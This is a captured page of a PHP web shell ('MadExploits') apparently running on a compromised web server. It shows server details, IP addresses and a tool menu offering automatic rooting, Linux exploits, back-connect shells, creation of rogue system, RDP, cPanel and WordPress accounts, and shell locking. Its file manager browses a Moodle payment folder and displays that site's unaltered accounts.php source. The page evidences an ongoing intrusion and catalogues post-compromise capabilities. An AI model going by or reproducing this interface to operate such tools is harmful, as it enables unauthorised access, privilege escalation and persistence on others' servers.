Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.126.134
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
payment /
[ HOME SHELL ]
Name
Size
Permission
Action
amd
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
gateway
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
accounts.php
4.29
KB
-rw-rw-r--
manage_account.php
2.24
KB
-rw-rw-r--
manage_gateway.php
2.23
KB
-rw-rw-r--
upgrade.txt
240
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : accounts.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Management of payment accounts * * @package core_payment * @copyright 2020 Marina Glancy * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once(__DIR__ . '/../config.php'); require_once($CFG->libdir . '/adminlib.php'); $showarchived = optional_param('showarchived', false, PARAM_BOOL); admin_externalpage_setup('paymentaccounts'); $PAGE->set_heading(get_string('paymentaccounts', 'payment')); $enabledplugins = \core\plugininfo\paygw::get_enabled_plugins(); echo $OUTPUT->header(); $accounts = \core_payment\helper::get_payment_accounts_to_manage(context_system::instance(), $showarchived); $table = new html_table(); $table->head = [get_string('accountname', 'payment'), get_string('type_paygw_plural', 'plugin'), '']; $table->colclasses = ['', '', 'mdl-right']; $table->data = []; foreach ($accounts as $account) { $gateways = []; $canmanage = has_capability('moodle/payment:manageaccounts', $account->get_context()); foreach ($account->get_gateways() as $gateway) { $status = $gateway->get('enabled') ? $OUTPUT->pix_icon('i/valid', get_string('gatewayenabled', 'payment')) : $OUTPUT->pix_icon('i/invalid', get_string('gatewaydisabled', 'payment')); $gateways[] = $status . ($canmanage ? html_writer::link($gateway->get_edit_url(), $gateway->get_display_name()) : $gateway->get_display_name()); } $name = $account->get_formatted_name(); if (!$account->is_available()) { $name .= ' ' . html_writer::span(get_string('accountnotavailable', 'payment'), 'badge badge-warning'); } if ($account->get('archived')) { $name .= ' ' . html_writer::span(get_string('accountarchived', 'payment'), 'badge badge-secondary'); } $menu = new action_menu(); $menu->set_alignment(action_menu::TL, action_menu::BL); $menu->set_menu_trigger(get_string('edit')); if ($canmanage) { $menu->add(new action_menu_link_secondary($account->get_edit_url(), null, get_string('edit'))); if (!$account->get('archived')) { $deleteurl = $account->get_edit_url(['delete' => 1, 'sesskey' => sesskey()]); $menu->add(new action_menu_link_secondary($deleteurl, null, get_string('deleteorarchive', 'payment'), ['data-action' => 'delete'])); } else { $restoreurl = $account->get_edit_url(['restore' => 1, 'sesskey' => sesskey()]); $menu->add(new action_menu_link_secondary($restoreurl, null, get_string('restoreaccount', 'payment'))); } } $table->data[] = [$name, join(', ', $gateways), $OUTPUT->render($menu)]; } echo html_writer::div(get_string('paymentaccountsexplained', 'payment'), 'pb-2'); if (has_capability('moodle/site:config', context_system::instance())) { // For administrators add a link to "Manage payment gateways" page. $link = html_writer::link(new moodle_url('/admin/settings.php', ['section' => 'managepaymentgateways']), get_string('type_paygwmanage', 'plugin')); $text = get_string('gotomanageplugins', 'payment', $link); echo html_writer::div($text, 'pb-2'); } echo html_writer::table($table); $PAGE->requires->event_handler('[data-action=delete]', 'click', 'M.util.show_confirm_dialog', array('message' => get_string('accountdeleteconfirm', 'payment'))); echo html_writer::div(html_writer::link(new moodle_url($PAGE->url, ['showarchived' => !$showarchived]), $showarchived ? get_string('hidearchived', 'payment') : get_string('showarchived', 'payment')), 'mdl-right'); echo $OUTPUT->single_button(new moodle_url('/payment/manage_account.php'), get_string('createaccount', 'payment'), 'get'); echo $OUTPUT->footer();
Close